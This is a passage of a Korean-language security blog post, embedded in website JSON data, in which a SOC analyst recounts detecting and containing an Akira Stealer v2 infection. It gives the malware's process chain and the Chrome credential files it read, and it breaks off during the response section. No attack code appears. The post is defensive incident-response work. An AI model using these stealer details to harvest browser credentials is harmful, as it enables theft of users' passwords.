[{"data":1,"prerenderedAt":15246},["ShallowReactive",2],{"sc:header-data-ko":3,"sc:footer-data-ko":489,"author-ko-pascal-asch-1864737b7d2e83":519,"content-ko-pascal-asch":549,"content-events-ko-pascal-asch":15236,"authors_data:Pascal Asch":15237},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"ko":13},{"title":14,"url":15,"alt":16},"홈","/ko","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"ko":21},{"title":22,"description":23},"Workplace","스마트하고 안전하며 유연한 워크스페이스를 위한 Microsoft 365 기반 솔루션으로, 최신 기술과 ID 서비스를 매끄럽게 통합합니다.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"ko":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"ko":34},{"title":35,"url":36},"Managed Intune","/ko/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"ko":40},{"title":41,"url":42},"Managed Entra","/ko/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"ko":46},{"title":47,"url":48},"Managed Workplace","/ko/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"ko":52},{"title":53,"url":54},"Consulting Services","/ko/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"ko":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"ko":64},{"title":65,"url":66},"Microsoft Entra Suite","/ko/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"ko":70},{"title":71,"url":72},"Microsoft Intune","/ko/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"ko":76},{"title":77,"url":78},"Microsoft Windows","/ko/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"ko":82},{"title":83,"url":84},"Windows 365 Cloud PC","/ko/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"ko":88},{"title":89,"url":90},"Cloud Workplace Foundation","/ko/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"ko":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"ko":100},{"title":101,"url":102},"Microsoft 365 Copilot","/ko/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"ko":106},{"title":107,"url":108},"Teams","/ko/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"ko":112},{"title":113,"url":114},"SharePoint & Power Platform","/ko/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"ko":118},{"title":119,"url":120},"Exchange Online","/ko/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"ko":124},{"title":125,"url":126},"Information Protection & Compliance","/ko/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"ko":130},{"title":131,"description":132},"Azure","Azure로 성장을 가속하세요: IaaS와 PaaS를 통해 클라우드 비용을 절감하고 효율을 높이며 혁신을 추진합니다.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"ko":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"ko":142},{"title":143,"url":144},"Azure Managed Services","/ko/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"ko":148},{"title":149,"url":150},"Azure Consulting","/ko/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"ko":154},{"title":155},"시나리오",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"ko":160},{"title":161,"url":162},"클라우드 계획","/ko/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"ko":166},{"title":167,"url":168},"클라우드로 마이그레이션","/ko/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"ko":172},{"title":173,"url":174},"비즈니스 혁신","/ko/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"ko":178},{"title":179,"url":180},"VMware 전략 재검토","/ko/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"ko":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"ko":190},{"title":191,"url":192},"Azure Foundation","/ko/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"ko":196},{"title":197,"url":198},"Azure AI Foundation","/ko/azure/azure-ai-foundation",{"name":86,"languages":200},{"ko":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"ko":205},{"title":206,"url":207},"Azure Data Foundation","/ko/azure/azure-data-foundation",{"name":188,"languages":209},{"ko":210},{"title":211,"url":212},"Azure Container Foundation","/ko/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"ko":216},{"title":217,"url":218},"Managed Dark Tenant","/ko/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"ko":222},{"title":223,"url":224},"Cloud Adoption Framework","/ko/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"ko":228},{"title":229,"url":230},"Cloud Competence Center","/ko/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"ko":234},{"title":235,"description":236,"emergency":237},"보안","수상 경력의 24/7 매니지드 서비스, 인시던트 대응, 최신 인프라 보호로 클라우드를 지킵니다.",{"text":238,"href":239,"skin":240,"icon":241},"공격을 받고 있나요?","/ko/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"ko":249},{"title":250,"url":251},"Managed Red Tenant","/ko/security/managed-red-tenant",{"name":214,"languages":253},{"ko":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"ko":259},{"title":260,"url":261},"Sentinel Data Lake","/ko/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"ko":265},{"title":266,"url":267},"Security Consulting","/ko/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"ko":274},{"title":275,"url":276},"Cloud Security Operations Center","/ko/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"ko":280},{"title":281,"url":282},"Global Secure Access","/ko/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"ko":286},{"title":287,"url":288},"MyWorkID","/ko/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"ko":295},{"title":296,"url":297},"Preventive Services","/ko/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"ko":301},{"title":302,"url":303},"Data Security Service","/ko/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"ko":307},{"title":308,"url":309},"Security Copilot Agents","/ko/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"ko":313},{"title":314,"url":315},"NIS2 이행","/ko/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"ko":319},{"title":320,"description":321},"제품","완전히 안전한 100% 클라우드 네이티브 Microsoft 환경을 위한 혁신적인 제품군으로, 협업과 네트워크 인증, 소프트웨어 관리를 강화합니다.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"ko":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","클라우드 기반 소프트웨어 배포",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"ko":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","클라우드에서 인증서 배포",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"ko":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Office 365 데이터를 로컬에서 활용",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"ko":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","서버 간 데이터 마이그레이션",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"ko":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Microsoft 365용 Terraform Provider",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"ko":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","네트워크 인증",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"ko":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Microsoft Teams에서 연락처 찾기",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"ko":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","실시간 Windows Autopilot 모니터링",{"name":396,"languages":397},"casestudies",{"ko":398},{"title":399,"url":400,"description":401},"고객 사례","/ko/casestudies","클라우드의 선구자: Blueprint 기반 접근 방식과 Infrastructure-as-Code 전문성을 갖춘, 포괄적인 클라우드 솔루션을 위한 최고의 Microsoft 파트너입니다.",{"name":403,"languages":404,"children":407},"company",{"ko":405},{"title":406,"description":401},"회사",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"ko":411},{"title":412},"회사 소개",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"ko":417},{"title":418,"url":419},"주요 현황","/ko/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"ko":423},{"title":424,"url":425},"연락처 및 위치","/ko/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"ko":429},{"title":430,"url":431}," glueckkanja 스위스","/ko/company/switzerland",{"name":433,"languages":434},"austria",{"ko":435},{"title":436,"url":437},"glueckkanja 오스트리아","/ko/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"ko":441},{"title":442},"채용",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"ko":447},{"title":448,"url":449},"채용 안내","/ko/career",{"name":451,"languages":452},"company-young-professionals",{"ko":453},{"title":454,"url":455},"Young Professionals","/ko/young-professionals",{"name":457,"languages":458},"company-jobs",{"ko":459},{"title":460,"url":461},"채용 공고","/ko/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"ko":465},{"title":466},"최신 소식",[468,474],{"name":469,"languages":470},"company-blog",{"ko":471},{"title":472,"url":473},"블로그","/ko/blog",{"name":469,"languages":475},{"ko":476},{"title":477,"url":478},"이벤트","/ko/events",[480],{"name":481,"languages":482},"career-meta",{"ko":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"ko":487},{"title":488,"url":425,"active":484},"문의",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksKo":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"개인정보 처리방침","/ko/privacy",{"title":514,"url":515},"법적 고지","/ko/imprint",{"title":517,"url":518},"쿠키 없음","/ko/cookies",{"id":520,"title":521,"body":522,"description":528,"extension":533,"meta":534,"name":521,"navigation":325,"otherLanguages":535,"path":545,"seo":546,"stem":547,"__hash__":548},"authors/pascal-asch.md","Pascal Asch",{"type":523,"value":524,"toc":529},"minimal",[525],[526,527,528],"p",{},"Pascal Asch ist Teil des Cyber Security Operations Centers (CSOC) von glueckkanja und auf die Analyse und Abwehr komplexer Bedrohungslagen spezialisiert. Sein Schwerpunkt liegt auf Incident Response, Threat Hunting und Malware-Analyse im Microsoft-Umfeld. Dabei verbindet er tiefgehendes technisches Know-how mit einem klaren Blick für forensische Zusammenhänge – von der ersten Auffälligkeit bis zur vollständigen Aufklärung eines Angriffs.",{"title":530,"searchDepth":531,"depth":531,"links":532},"",2,[],"md",{},{"en":536,"es":537,"sv":538,"fi":539,"da":540,"ko":541,"nl":542,"no":543,"ja":544},"Pascal Asch is part of the Cyber Security Operations Center (CSOC) at glueckkanja, specializing in the analysis and mitigation of complex threat scenarios. His focus lies in incident response, threat hunting, and malware analysis within Microsoft environments. He combines deep technical expertise with a sharp forensic mindset – from the first anomaly to the full resolution of an attack.","Pascal Asch forma parte del Cyber Security Operations Center (CSOC) de glueckkanja y está especializado en el análisis y la defensa frente a situaciones de amenaza complejas. Su enfoque se centra en Incident Response, Threat Hunting y análisis de malware en el entorno de Microsoft. Combina un profundo conocimiento técnico con una visión clara de las relaciones forenses, desde el primer indicio hasta el esclarecimiento completo de un ataque.","Pascal Asch är en del av glueckkanjas Cyber Security Operations Center (CSOC) och specialiserad på analys och avvärjning av komplexa hotbilder. Hans fokus ligger på Incident Response, Threat Hunting och malware-analys i Microsoft-miljö. Han förenar djup teknisk kompetens med en tydlig blick för forensiska samband, från den första avvikelsen till fullständig utredning av en attack.","Pascal Asch työskentelee glueckkanjan Cyber Security Operations Centerissä (CSOC) ja on erikoistunut monimutkaisten uhkatilanteiden analysointiin ja torjuntaan. Hänen painopisteenään ovat Incident Response, Threat Hunting ja haittaohjelma-analyysi Microsoft-ympäristössä. Hän yhdistää syvän teknisen osaamisen selkeään näkemykseen forensisista yhteyksistä ensimmäisestä poikkeamasta hyökkäyksen täydelliseen selvittämiseen.","Pascal Asch er en del af glueckkanjas Cyber Security Operations Center (CSOC) og specialiseret i analyse og afværgning af komplekse trusselsbilleder. Hans fokus ligger på Incident Response, Threat Hunting og malware-analyse i Microsoft-miljøet. Han kombinerer dybdegående teknisk knowhow med et klart blik for forensiske sammenhænge, fra den første anomali til den fuldstændige opklaring af et angreb.","Pascal Asch은 glueckkanja의 Cyber Security Operations Center(CSOC) 소속으로 복잡한 위협 상황의 분석과 방어를 전문으로 합니다. 그의 중점 분야는 Microsoft 환경에서의 Incident Response, Threat Hunting, 멀웨어 분석입니다. 그는 깊이 있는 기술적 노하우와 포렌식 맥락에 대한 명확한 시각을 결합하여, 최초의 이상 징후부터 공격의 완전한 규명에 이르기까지 대응합니다.","Pascal Asch is onderdeel van het Cyber Security Operations Center (CSOC) van glueckkanja en gespecialiseerd in de analyse en afweer van complexe dreigingssituaties. Zijn focus ligt op incident response, threat hunting en malware-analyse binnen het Microsoft-landschap. Daarbij combineert hij diepgaande technische kennis met een scherp oog voor forensische samenhang, van de eerste afwijking tot de volledige reconstructie van een aanval.","Pascal Asch er en del av Cyber Security Operations Center (CSOC) hos glueckkanja og spesialisert på analyse og avverging av komplekse trusselsituasjoner. Tyngdepunktet ligger på Incident Response, Threat Hunting og malware-analyse i Microsoft-miljøet. Han kombinerer dyp teknisk kompetanse med et klart blikk for forensiske sammenhenger, fra første avvik til fullstendig oppklaring av et angrep.","Pascal AschはglueckkanjaのCyber Security Operations Center（CSOC）のメンバーで、複雑な脅威状況の分析と防御を専門としています。重点はMicrosoft環境におけるIncident Response、Threat Hunting、マルウェア解析です。深い技術的知見と、フォレンジックの文脈を見通す視点を組み合わせ、最初の兆候から攻撃の全容解明までを担います。","/pascal-asch",{"title":521,"description":528},"pascal-asch","h9IFki986nfubTkh2vFlR-qx4IOL2kjI9sufDTKc3ao",[550,13079],{"id":551,"title":552,"author":553,"body":554,"cta":494,"description":562,"eventid":494,"extension":533,"hideInRecent":484,"layout":12952,"meta":12953,"moment":12957,"navigation":325,"path":13070,"seo":13071,"stem":13072,"tags":13073,"webcast":484,"__hash__":13078},"content_ko/posts/2025-06-16-quiet-breach.md","Akira Stealer 들여다보기: 모듈형 스틸러에 대한 완전한 기술 분석",[521],{"type":523,"value":555,"toc":12807},[556,560,563,571,574,593,596,614,623,626,629,653,661,671,678,681,684,699,706,709,712,726,730,732,739,744,747,750,762,771,778,781,787,790,794,796,802,808,811,815,817,820,846,852,858,862,864,867,871,873,876,878,884,887,892,895,906,909,912,933,936,943,950,952,958,961,967,970,1005,1008,1017,1023,1032,1035,1047,1050,1057,1059,1067,1077,1109,1115,1120,1141,1147,1150,1153,1158,1167,1174,1176,1179,1191,1194,1228,1234,1260,1269,1272,1277,1285,1287,1296,1302,1320,1323,1328,1362,1366,1369,1372,1378,1392,1398,1404,1406,1411,1415,1417,1497,1500,1504,1506,1511,1517,1522,1531,1536,1541,1552,1555,1560,1569,1575,1578,1582,1584,1596,1601,1619,1625,1634,1645,1652,1657,1661,1663,1669,1695,1698,1712,1715,1724,1727,1731,1733,1740,1743,1746,1759,1769,1776,1797,1800,1806,1810,1812,1815,1824,1836,1861,1868,1874,1877,1884,1887,1900,1907,1909,1916,1920,1922,1928,2026,2033,2041,2043,2046,2069,2072,2101,2104,2148,2151,2160,2163,2181,2187,2190,2199,2202,2214,2221,2225,2227,2234,2256,2263,2297,2300,2315,2322,2327,2338,2341,2345,2347,2350,2365,2372,2383,2392,2429,2436,2439,2443,2445,2451,2456,2496,2499,2514,2517,2526,2532,2535,2539,2541,2544,2553,2556,2602,2609,2613,2615,2620,2625,2653,2660,2662,2678,2682,2684,2687,2727,2733,2739,2743,2745,2763,2773,2780,2817,2824,2870,2879,2883,2885,2888,2916,2926,2933,2935,2940,2944,2946,2952,2956,2958,2965,2991,2998,3258,3261,3266,3269,3302,3308,3312,3314,3317,3321,3323,3326,3428,3431,3435,3437,3440,3602,3605,3628,3632,3634,3642,3884,3887,3915,3919,3921,3954,3960,3963,3995,3999,4001,4007,4012,4015,4033,4036,4044,4049,4052,4132,4140,4143,4149,4157,4161,4163,4169,4174,4177,4194,4201,4206,4213,4275,4287,4292,4298,4325,4328,4366,4369,4374,4377,4391,4395,4397,4402,4424,4431,4437,4439,4443,4445,4451,4455,4457,4461,4463,4468,4495,4501,4505,4507,4513,4530,4554,4561,4565,4567,4570,4579,4593,4596,4600,4602,4615,4618,4627,4633,4640,4642,4646,4648,4658,4662,4664,4669,4683,4697,4701,4703,4786,4789,4796,4798,4803,4861,4868,4994,4997,5142,5146,5148,5151,5205,5208,5212,5214,5220,5273,5276,5280,5282,5285,5337,5340,5344,5346,5353,5405,5408,5412,5414,5421,5462,5465,5469,5471,5478,5560,5563,5567,5569,5572,5619,5622,5627,5630,5633,5637,5639,5644,5650,5655,5661,5666,5672,5677,5683,5688,6089,6093,6095,6135,6139,6141,6149,6153,6155,6165,6170,6195,6216,6221,6307,6311,6313,6407,6410,6416,6423,6425,6428,6483,6540,6547,6549,6552,6587,6622,6629,6631,6634,6667,6704,6711,6713,6716,6785,6831,6838,6840,6843,6871,6900,6907,6909,6912,6940,6960,6970,6972,6975,7000,7039,7043,7045,7078,7082,7084,7087,7090,7093,7096,7099,7104,7129,7134,7164,7171,7180,7202,7411,7415,7417,7424,7522,7525,7529,7531,7538,7631,7641,7647,7650,7655,7661,7689,7694,7724,7777,7796,7799,7804,7852,7856,7858,7861,7865,7867,7873,7993,8013,8017,8019,8024,8098,8119,8123,8125,8128,8131,8134,8137,8236,8244,8248,8250,8255,8290,8312,8316,8318,8321,8324,8332,8335,8423,8437,8441,8443,8446,8449,8542,8548,8550,8556,8560,8562,8565,8630,8647,8650,8684,8687,8691,8693,8698,8711,8756,8782,8787,8800,8876,8931,8935,8937,8940,8946,8986,8996,9002,9012,9016,9018,9021,9050,9076,9082,9086,9088,9095,9102,9104,9110,9165,9192,9196,9198,9201,9266,9273,9312,9316,9318,9324,9339,9342,9377,9381,9383,9390,9434,9448,9454,9461,9463,9466,9470,9472,9475,9509,9512,9537,9541,9543,9548,9551,9575,9599,9603,9605,9608,9632,9636,9638,9641,9661,9665,9667,9670,9677,9790,9795,9840,9844,9846,9853,9887,9941,9946,9949,9953,9955,9958,9962,9964,9967,9973,9977,9979,9982,10037,10052,10056,10058,10069,10138,10147,10152,10155,10199,10201,10205,10207,10210,10302,10307,10436,10440,10442,10445,10450,10523,10541,10546,10566,10574,10579,10585,10600,10617,10623,10681,10702,10707,10724,10729,10772,10786,10789,10793,10795,10800,10804,10806,10813,10819,10823,10825,10932,10939,10943,10945,10952,10957,11038,11045,11052,11056,11058,11061,11090,11097,11101,11103,11107,11109,11116,11119,11122,11125,11269,11272,11276,11278,11281,11285,11287,11290,11326,11332,11336,11338,11341,11367,11370,11376,11380,11382,11387,11404,11410,11414,11416,11420,11422,11438,11462,11469,11485,11501,11504,11507,11509,11519,11523,11525,11954,11957,11961,11963,11969,11972,11975,11982,11985,11996,12002,12005,12010,12014,12016,12019,12024,12038,12042,12044,12341,12344,12348,12350,12462,12465,12469,12471,12525,12528,12532,12534,12697,12700,12704,12706,12747,12750,12754,12756,12759,12762,12765,12768,12771,12774,12779,12783,12785,12788,12791,12794,12797,12800,12803],[557,558,559],"h1",{"id":559},"프롤로그",[526,561,562],{},"{: .h3-font-size}",[526,564,565,566,570],{},"수많은 현대적 공격이 그렇듯, 이 공격도 조용히 시작되었습니다. 신뢰도가 낮은 Defender 경고 하나가 ",[567,568,569],"strong",{},"\"의심스러운 탐색 활동 시퀀스(Suspicious sequence of exploration activities)\""," 라는 이름으로, 신규 고객을 우리 glueckkanja 사이버 보안 운영 센터(CSOC)로 온보딩하는 단계에서 표면화되었습니다.",[526,572,573],{},"시그니처 탐지도 없었습니다. 멀웨어 분류도 없었습니다. 실시간 보호 대응도 없었습니다. 오직 Microsoft 365 Defender 안에서 소음에 묻힌 단 하나의 행위 상관관계뿐이었지만, 그것은 분명히 잘못된 무언가였습니다.",[526,575,576,577,581,582,585,586,589,590],{},"경고를 분류하던 중 한 가지 특정 동작이 제 주의를 끌었습니다. ",[578,579,580],"code",{},"python.exe","가 Chromium 프로필 내부의 ",[578,583,584],{},"Login Data","와 ",[578,587,588],{},"Web Data"," 파일에 모두 접근했던 것입니다. Microsoft Defender는 이를 즉시 심각도 높은 인시던트로 격상시켰습니다. ",[567,591,592],{},"\"암호 및 기타 민감한 웹 브라우저 정보의 도난 가능성(Possible theft of passwords and other sensitive web browser information).\"",[526,594,595],{},"이것은 오탐이 아니었습니다. 더 깊은 무언가의 빙산의 일각이었습니다.",[526,597,598,599,602,603,606,607,609,610,613],{},"텔레메트리를 역추적하면서, 저는 시작 프로그램 위치에 있는 평범한 바이너리 ",[578,600,601],{},"Updater.exe","를 발견했습니다. 이 바이너리는 NodeJS 기반 래퍼(",[578,604,605],{},"main.exe",")를 생성했고, 그 래퍼는 ",[578,608,580],{},"를 통해 ",[578,611,612],{},"astor.py","라는 스크립트를 실행하는 명령줄을 실행했습니다.",[615,616,621],"pre",{"className":617,"code":619,"language":620,"meta":530},[618],"language-text","Updater.exe → main.exe → cmd.exe → python.exe Crypto\\Util\\astor.py\n","text",[578,622,619],{"__ignoreMap":530},[526,624,625],{},"이 스크립트는 단순히 자격 증명을 긁어모으는 데 그치지 않았습니다. 레지스트리 조회, 시스템 지문 채취, 권한 인식 열거 등 침해 후 정찰 단계를 순차적으로 실행했습니다. 탐지를 회피하기 위해 네이티브 시스템 동작을 모방하며 외과 수술 같은 정밀함으로 작동했습니다. 그리고 거의 성공할 뻔했습니다.",[526,627,628],{},"최초 대응 시점 기준으로:",[630,631,632,642,650],"ul",{},[633,634,635,637,638,641],"li",{},[578,636,601],{},"는 VirusTotal의 ",[567,639,640],{},"69개 엔진 중 단 1개","에서만 탐지되었습니다.",[633,643,644,646,647,649],{},[578,645,605],{},", ",[578,648,612],{}," 및 관련된 모든 구성 요소는 사실상 VirusTotal에서 탐지되지 않았습니다.",[633,651,652],{},"서명된 파일은 없었습니다. 상승된 권한 컨텍스트도 없었습니다. 그저 \"평범한\" 프로세스들이 매우 평범하지 않은 일을 하고 있었을 뿐입니다.",[526,654,655,657,658,660],{},[578,656,601],{},"는 자격 증명을 건드리지 않았습니다. 그 작업은 ",[578,659,612],{},", 즉 메모리 상주 Python 페이로드의 몫이었습니다. 이 파일은 설계상 거의 흔적을 남기지 않았습니다.",[526,662,663,666,667,670],{},[567,664,665],{},"21분"," 이내에 해당 시스템은 네트워크에서 격리되었습니다. ",[567,668,669],{},"70분"," 이내에는 내부 ID, SaaS 플랫폼, 서드파티 서비스 등 영향을 받은 모든 범위에서 자격 증명이 교체되었습니다.",[526,672,673,674,677],{},"하지만 진정한 전환점은 우리가 Python 페이로드를 추출하고 완전히 복호화했을 때 찾아왔습니다. 우리가 발견한 것은 일반적인 스틸러가 아니라, Telegram을 통해 상업적으로 배포되는 멀웨어 계열인 ",[567,675,676],{},"Akira Stealer v2","의 맞춤형 배포판이었습니다.",[526,679,680],{},"우리 자체 위협 인텔리전스와 리버스 엔지니어링 역량 덕분에, 우리는 멀웨어의 전체 기능을 재구성하고, 삽입된 모든 지표를 추출하며, 그 스테이징, 유출, 자격 증명 표적 로직을 상세히 이해할 수 있었습니다.",[526,682,683],{},"더 중요한 것은, 우리가 기술적 귀속에서 멈추지 않았다는 점입니다. 우리는 한 걸음 더 나아갔습니다.",[526,685,686,687,690,691,694,695,698],{},"우리는 고객에게 ",[567,688,689],{},"유출된 자격 증명의 완전한 데이터셋","을 제공할 수 있었습니다. 클라우드 서비스, CRM 시스템, 내부 플랫폼, 심지어 핵심 직원들이 사용하는 개인 도구의 접근 자격 증명을 포함해 ",[567,692,693],{},"100개가 넘는 고유한 사용자명-암호 조합","이 있었습니다. 이 탈취는 ",[567,696,697],{},"수개월간"," 지속되어 왔으며, 우리는 그 전부를 설명할 수 있었습니다.",[526,700,701,702,705],{},"이 사례에서 얻은 통찰을 활용해, 우리는 영향을 받은 시스템을 스캔하고, 자격 증명 접근 패턴을 재구성하며, 상세한 포렌식 보고서를 생성하는 ",[567,703,704],{},"감염 후 분석 도구","를 구축했습니다. 정확히 무엇이, 언제, 어디에서 탈취되었는지 매핑합니다.",[526,707,708],{},"이 보고서 끝부분에서 그 스캐너를 잠깐 소개하겠습니다.",[526,710,711],{},"이것은 단순한 인시던트 그 이상이기 때문입니다.\n이것이 우리가 조사하는 방식입니다. 이것이 우리가 보호하는 방식입니다.",[526,713,714,722,725],{},[567,715,716,721],{},[717,718,720],"a",{"href":719},"/ko/security/cloud-security-operations-center/","glueckkanja CSOC","에 오신 것을 환영합니다.",[723,724],"br",{},"\n이것이 우리가 일하는 방식입니다. 침해는 기다려 주지 않기 때문입니다.",[557,727,729],{"id":728},"_1-초기-이벤트-및-분류-요약","1. 초기 이벤트 및 분류 요약",[526,731,562],{},[526,733,734,735,738],{},"2025년 3월 31일, Microsoft Defender for Endpoint는 Windows 10 64비트 엔드포인트에서 ",[567,736,737],{},"\"의심스러운 탐색 활동 시퀀스\""," 로 표시된 경고를 생성했습니다. 저는 이 신호를 바탕으로 분류를 시작했고, 프로세스 트리, 시스템 타임라인, 그리고 Defender가 상관 분석한 증거를 사용해 영향을 받은 시스템을 검토했습니다.",[740,741,743],"h2",{"id":742},"_11-타임라인-기반-분류","1.1 타임라인 기반 분류",[526,745,746],{},"{: .h4-font-size}",[526,748,749],{},"이 경고는 추가 조사가 필요한 프로세스 시퀀스를 가리켰습니다. 초기 검토 중, 저는 로컬 사용자 프로필 내의 Chrome 브라우저 데이터에 대해 다음과 같은 접근 패턴을 관찰했습니다:",[630,751,752,757],{},[633,753,754],{},[578,755,756],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",[633,758,759],{},[578,760,761],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data",[526,763,764,765,767,768,770],{},"이 접근은 ",[578,766,601],{},"라는 프로세스에 의해 시작되었습니다. Microsoft Defender는 휴리스틱이나 행위 분석을 근거로 이 바이너리를 플래그하지 않았지만, 저는 VirusTotal에서 ",[578,769,601],{},"에 대한 탐지를 발견했습니다. 당시 단 하나의 엔진에서 플래그된 상태였습니다.",[526,772,773],{},[774,775],"img",{"alt":776,"src":777},"Microsoft Defender","https://res.cloudinary.com/c4a8/image/upload/v1749797184/blog/pics/microsoft-defender.png",[526,779,780],{},"관찰된 전체 실행 체인은 다음과 같았습니다:",[615,782,785],{"className":783,"code":784,"language":620,"meta":530},[618],"winlogon.exe\n└── userinit.exe\n    └── explorer.exe\n        └── Updater.exe\n            └── main.exe\n                └── cmd.exe /d /s /c \"python.exe Crypto\\Util\\astor.py\"\n                    └── python.exe Crypto\\Util\\astor.py\n",[578,786,784],{"__ignoreMap":530},[526,788,789],{},"이 단계에서는 관련 파일에 대한 더 깊은 정적 또는 동적 분석은 수행되지 않았습니다. 제 초점은 상위 수준의 동작과 맥락을 이해하는 데 있었습니다. 프로세스 이름과 파일 경로는 평범했고, 연쇄된 Python 실행 외에는 의심스러운 명령줄 인수가 없었습니다.",[740,791,793],{"id":792},"_12-초기-대응","1.2 초기 대응",[526,795,746],{},[526,797,798,799,801],{},"최초 경고로부터 ",[567,800,665],{}," 이내에, 저는 Defender for Endpoint의 격리 기능을 사용해 호스트 격리를 시작했습니다. 목표는 추가 확산이나 유출 가능성을 차단하는 것이었습니다.",[526,803,804,805,807],{},"첫 ",[567,806,669],{}," 이내에, 우리는 영향을 받은 호스트에서 사용된 것으로 알려진 자격 증명을 교체하는 작업을 진행했습니다. 내부 시스템, SaaS 플랫폼, 핵심 서드파티 벤더를 